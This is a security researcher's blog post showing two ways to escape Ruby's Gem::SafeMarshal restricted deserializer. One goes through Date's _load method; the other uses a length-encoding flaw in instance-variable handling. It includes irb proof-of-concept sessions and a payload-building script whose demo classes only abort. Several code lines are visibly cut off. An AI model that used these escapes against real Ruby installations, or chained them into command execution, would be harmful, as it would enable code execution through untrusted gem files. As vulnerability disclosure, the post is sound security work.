Gem::SafeMarshal escape
Luke Jahnke3 December 2024

In September 2023, Ruby added Gem::SafeMarshal in an attempt to make deserialization while processing packaged library .gem files safer. I decided to learn how it works and take on the challenge of breaking it to execute arbitrary commands.

# How to use Gem::SafeMarshal

Gem::SafeMarshal can be loaded by requiring rubygems/safe_marshal or calling Gem.load_safe_marshal. Gem::SafeMarshal defines two methods, safe_load and load. With the load method you specify which classes, symbols and instance variables are permitted, whereas the safe_load method has a hardcoded list of what is permitted.

irb(main):001:0> Gem.load_safe_marshal
=> true

irb(main):002:0> class Foo; end
=> nil

irb(main):003:0> serialized_foo = Marshal.dump(
=> "\x04\bo:\bFoo\x00"

irb(main):004:0> Gem::SafeMarshal.safe_load(serialized_foo)
 'Gem::SafeMarshal::Visitors::ToRuby#resolve_class': Attempting to load unpe
rmitted class "Foo" @ root.object (Gem::SafeMarshal::Visitors::ToRuby::Unper

irb(main):005:0> Gem::SafeMarshal.load(serialized_foo)
 'Gem::SafeMarshal::Visitors::ToRuby#resolve_class': Attempting to load unpe
rmitted class "Foo" @ root.object (Gem::SafeMarshal::Visitors::ToRuby::Unper

irb(main):006:0> Gem::SafeMarshal.load(serialized_foo,
  permitted_classes: ["Foo"]
=> #<Foo:0x00007f149ec54a90>

# How is Gem::SafeMarshal implemented

It wasn't obvious to me how SafeMarshal could be easily implemented as Marshal does not expose any means to restrict which classes can be deserialized, as opposed to Java which has method overriding of resolveClass on a subclass of It turns out that the answer is that it wasn't easy and was achieved by creating a partial reimplementation of Marshal in pure Ruby.

# How to escape Gem::SafeMarshal

The first thing I checked was if the lists of what is permitted by Gem::SafeMarshal.safe_load is overly permissive. The lists can be found in lib/rubygems/safe_marshal.rb and are shown below:

module Gem
  module SafeMarshal





      "String" => %w[E encoding @taguri @debug_created_info],
      "Time" => %w[
        offset zone nano_num nano_den submicro
        @_zone @marshal_with_utc_coercion
      "Gem::Dependency" => %w[
        @name @requirement @prerelease @version_requirement
        @version_requirements @type @force_ruby_platform
      "Gem::NameTuple" => %w[@name @version @platform],
      "Gem::Platform" => %w[@os @cpu @version],
      "Psych::PrivateType" => %w[@value @type_id],

At first glance, the lists of what is permitted seemed appropriately limited and plausibly contained only essential items. The list of permitted classes being so short meant I decided to work systematically through every class, starting at the top with the Date class.

I found the Date class implemented with C in the file ext/date/date_core.c.

static VALUE cDate, cDateTime;

    cDate = rb_define_class("Date", rb_cObject);
    rb_define_method(cDate, "marshal_dump", d_lite_marshal_dump, 0);
    rb_define_method(cDate, "marshal_load", d_lite_marshal_load, 1);
    rb_define_singleton_method(cDate, "_load", date_s__load, 1);

I started with the marshal_load method as it is invoked during deserialization and is the common start of deserialization gadget chains. The marshal_load method was not too interesting, mostly data validation followed by stuffing values into an internal C struct. However, the next method, _load, which can also be invoked during deserialization, was much more interesting.

static VALUE
date_s__load(VALUE klass, VALUE s)
    VALUE a, obj;

    a = rb_marshal_load(s);
    obj = d_lite_s_alloc(klass);
    return d_lite_marshal_load(obj, a);

The _load method calls the C function rb_marshal_load, equivalent to Marshal.load in Ruby, with a value under our control. This means we can use a serialized Date object to obtain an arbitrary Marshal deserialization primitive. We can use this to move from Gem::SafeMarshal deserialization with restricted classes to Marshal deserialization with unrestricted classes. From Marshal, we can use a deserialization gadget chain to achieve arbitrary command execution.

irb(main):001> require "date"
=> true

irb(main):002> Gem.load_safe_marshal
=> true

irb(main):003* class Foo
irb(main):004*   def marshal_dump; end
irb(main):005*   def marshal_load(*)
irb(main):006*     abort "You win - Foo#marshal_load was called"
irb(main):007*   end
irb(main):008> end
=> :marshal_load

irb(main):009* class Date
irb(main):010*   undef_method :marshal_dump
irb(main):011*   def _dump(_depth)
irb(main):012*     Marshal.dump(
irb(main):013*   end
irb(main):014> end
=> :_dump

irb(main):015> Gem::SafeMarshal.safe_load(Marshal.dump(
You win - Foo#marshal_load was called

# A more interesting Gem::SafeMarshal escape

Instead of auditing more permitted classes, I moved onto reading source code of Gem::SafeMarshal. I came across some incredibly suspicious looking code within the instance variable handling. The code generates a serialized string using string concatenation including attacker controlled data. The serialized string is then passed to the real Marshal.load.

      def visit_Gem_SafeMarshal_Elements_WithIvars(e)
            marshal_string = "\x04\bIu:\tTime".b
            marshal_string.concat(s.size + 5)
            marshal_string << s
            marshal_string.concat(internal.size + 5)

            internal.each do |k, v|
              marshal_string.concat(k.size + 5)
              dumped = Marshal.dump(v)
              dumped[0, 2] = ""

            object = @objects[object_offset] = Marshal.load(marshal_string)

We control the value stored in the variable s in the above visit_Gem_SafeMarshal_Elements_WithIvars code. By supplying a string of size 0xf6, when 5 is added, the value will then be 0xfb, which Marshal will interpret as length 0 but our full s value is still concatenated.

This works because the Marshal format has various single byte encodings of the integer 0, as shown below, which is unaccounted for by Gem::SafeMarshal.

irb(main):001:0> Marshal.dump(0)
=> "\x04\bi\x00"

irb(main):002:0> Marshal.load("\x04\bi\x00")
=> 0

irb(main):003:0> Marshal.load("\x04\bi\x05")
=> 0

irb(main):004:0> Marshal.load("\x04\bi\xfb")
=> 0

Now we have to work out what Marshal is expecting and how to craft one of those, and hope it has an impact to security.

It turns out Marshal is in the state ready to receive instance variables. First it needs to know how many instance variables to expect, I chose 1, then a name, I chose :zone, then a value. The value can be an arbitrary serialized object, thereby achieving deserialization with unrestricted classes once again. Here we can use a deserialization gadget chain to achieve arbitrary command execution (just be careful of the 240 or so byte limit).

irb(main):001* class Foo
irb(main):002*   def marshal_load(*)
irb(main):003*     abort "You win - Foo#marshal_load was called"
irb(main):004*   end
irb(main):005> end
=> :marshal_load

irb(main):006> Gem.load_safe_marshal
=> true

irb(main):007* Gem::SafeMarshal.safe_load(
irb(main):008*   "\x04\bIu:\tTime\x01\xF6\x06:\tzoneU:\bFoo0" + ("\x00" * 233)
irb(main):009> )
You win - Foo#marshal_load was called

The payload was generated using the following code:

class Foo
  def marshal_dump

payload =
"#{Marshal::MAJOR_VERSION.chr}#{Marshal::MINOR_VERSION.chr}" +
Marshal.dump(:Time)[2..-1] +
Marshal.dump(0xfb - 5)[3..-1] +
Marshal.dump(1)[3..-1] +
Marshal.dump(:zone)[2..-1] +
Marshal.dump([2..-1] +
("\x00" * 233)

puts payload.inspect
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